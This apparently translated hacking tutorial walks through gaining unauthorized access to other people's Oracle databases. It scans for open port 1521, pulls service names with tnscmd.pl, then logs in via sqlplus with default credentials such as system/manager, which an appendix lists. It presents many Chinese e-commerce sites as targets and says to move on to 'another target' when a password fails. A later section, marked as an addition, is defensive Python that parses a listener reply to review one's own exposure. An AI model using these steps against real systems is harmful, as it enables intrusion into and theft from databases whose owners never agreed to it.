By default, Oracle's administrator passwords are fixed to facilitate installation and debugging. An Oracle database has two users with DBA permissions, SYS and SYSTEM. I found that the Oracle databases of many Chinese websites, including many large e-commerce websites, did not change the passwords of these two users. We can use this default password to find things we are interested in.
Before testing, we need some background. To connect to an Oracle database we need to know its service_name or SID value, just as with MSSQL we need to know the database name. So how can we know? Obviously, this is not the case. Here we will first talk about Oracle's TNS listener, which sits between the database client and the database server. By default it listens on port 1521, which can be changed. However, if you open a plain TCP session to port 1521, Oracle will not return a banner, and if you type something it may even disconnect you. Here we need tnscmd.pl, a Perl program. It can query whether the remote Oracle database is enabled (that is, ping), query the version, and query its service name, service status, and database service name, and the accuracy is very high.
If anything in the theory is unclear, you can look up the relevant materials. Now start testing. The required tools are ActivePerl, the Oracle client, Superscan or other port-scanning software, and tnscmd.pl. We first use Superscan to scan for hosts with port 1521 open; assume the IP address is xx.xx.110.110. What we need to do next is use tnscmd.pl to query the service name of the remote database. The usage of tnscmd.pl is as follows:

    C:\perl\bin>perl tnscmd.pl
    usage: tnscmd.pl [command] -h hostname
           where "command" is something like ping, version, status, etc.
           (default is ping)
           [-p port] - alternate TCP port to use (default is 1521)
           [--logfile logfile] - write raw packets to specified logfile
           [--indent] - indent & outdent on parens
           [--rawcmd command] - build your own CONNECT_DATA string
           [--cmdsize bytes] - fake TNS command size (reveals packet leakage)

Below we use only a few simple commands; the other commands are also very useful. Let's explore them together.
Then we run:

    C:\perl\bin>perl tnscmd.pl services -h xx.xx.110.110 -p 1521 --indent
    sending (CONNECT_DATA=(COMMAND=services)) to xx.xx.110.110:1521
    writing 91 bytes
    reading
    ._.......6.........?. ..........
    DESCRIPTION=
    TMP=
    VSNNUM=135286784
    ERR=0
    SERVICES_EXIST=1
    .Q........
    SERVICE=
    SERVICE_NAME=ORCL
    INSTANCE=
    INSTANCE_NAME=ORCL
    NUM=1
    INSTANCE_CLASS=ORACLE
    HANDLER=
    HANDLER_DISPLAY=DEDICATED SERVER
    STA=ready
    HANDLER_INFO=LOCAL SERVER
    HANDLER_MAXLOAD=0
    HANDLER_LOAD=0
    ESTABLISHED=447278
    REFUSED=0
    HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227
    HANDLER_NAME=DEDICATED
    ADDRESS=
    PROTOCOL=beq
    PROGRAM=/home/oracle/bin/oracle
    ENVS="ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL"
    ARGV0=oracleORCL
    ARGS="
    LOCAL=NO
    "
    .........@

From the above information we can see that the database service is named ORCL. We can then connect to it remotely with the sqlplus tool, using the default Oracle administrator username and password system/manager or sys/manager, or others such as mdsys/mdsys and ctxsys/ctxsys; the default users and passwords change with the version. As follows:

    C:\oracle\ora90\BIN>sqlplus /nolog
    SQL*Plus: Release 9.0.1.0.1 - Production on Thu May 23 11:36:59 2002
    (c) Copyright 2001 Oracle Corporation. All rights reserved.
    SQL>connect system/manager@
    (description=(address_list=(address=(protocol=tcp)
    (host=xx.xx.110.110)(port=1521)))
    (connect_data=(SERVICE_NAME=ORCL)));

If the password is correct, the system prompts "Connected". If not, try another default username and password. In my attempt, dbsnmp/dbsnmp could be used. Of course, if the other party has changed the default passwords, we can only move on to another target. However, I found that many of them do not change them. This is a security awareness problem.
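Anyone who can reach port 1521 gets the `services` reply shown earlier without supplying credentials. As an added example (not part of the original article or of tnscmd.pl), the Python below parses such a reply and lists what it discloses, which is a quick way to review your own listener's exposure. `SAMPLE_REPLY`, `decode_vsnnum` and `listener_disclosure` are names made up here, and the sample is constructed from the fields printed above.

```python
import re

# Constructed sample: printable fields of the listener reply shown above,
# written flat (nested parentheses) instead of one field per line.
SAMPLE_REPLY = (
    '(DESCRIPTION=(TMP=)(VSNNUM=135286784)(ERR=0)(SERVICES_EXIST=1))'
    '(SERVICE=(SERVICE_NAME=ORCL)(INSTANCE=(INSTANCE_NAME=ORCL)(NUM=1)'
    '(INSTANCE_CLASS=ORACLE)(HANDLER=(HANDLER_DISPLAY=DEDICATED SERVER)'
    '(STA=ready)(HANDLER_NAME=DEDICATED)(ADDRESS=(PROTOCOL=beq)'
    '(PROGRAM=/home/oracle/bin/oracle)'
    '(ENVS="ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL")'
    '(ARGV0=oracleORCL)))))'
)

LEAF = re.compile(r'\(([A-Z0-9_]+)=([^()]*)\)')  # (KEY=value) with no nesting


def decode_vsnnum(vsnnum):
    """Unpack VSNNUM using the commonly documented layout:
    8 bits major, then 4, 8, 4 and 8 bits for the remaining parts."""
    n = int(vsnnum)
    parts = (n >> 24, (n >> 20) & 0xF, (n >> 12) & 0xFF, (n >> 8) & 0xF, n & 0xFF)
    return '.'.join(str(p) for p in parts)


def listener_disclosure(reply):
    """Return what an unauthenticated 'services' reply tells any client."""
    found = {'version': None, 'services': [], 'instances': [], 'env': {}}
    for key, value in LEAF.findall(reply):
        if key == 'VSNNUM':
            found['version'] = decode_vsnnum(value)
        elif key == 'SERVICE_NAME' and value not in found['services']:
            found['services'].append(value)
        elif key == 'INSTANCE_NAME' and value not in found['instances']:
            found['instances'].append(value)
        elif key == 'ENVS':
            # ENVS is a quoted, comma-separated list of NAME=value pairs
            for pair in value.strip('"\'').split(','):
                name, _, val = pair.partition('=')
                found['env'][name.strip()] = val.strip()
    return found


if __name__ == '__main__':
    for field, value in listener_disclosure(SAMPLE_REPLY).items():
        print(f'{field}: {value}')
```

For the reply above, the listener gives away the server version, the service and instance names, and the ORACLE_HOME and ORACLE_SID of the server process.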
Appendix: Oracle Default Administrator Passwords
1. Username: sys, Password: change_on_install
2. Username: system, Password: manager
3. Username: scott, Password: tiger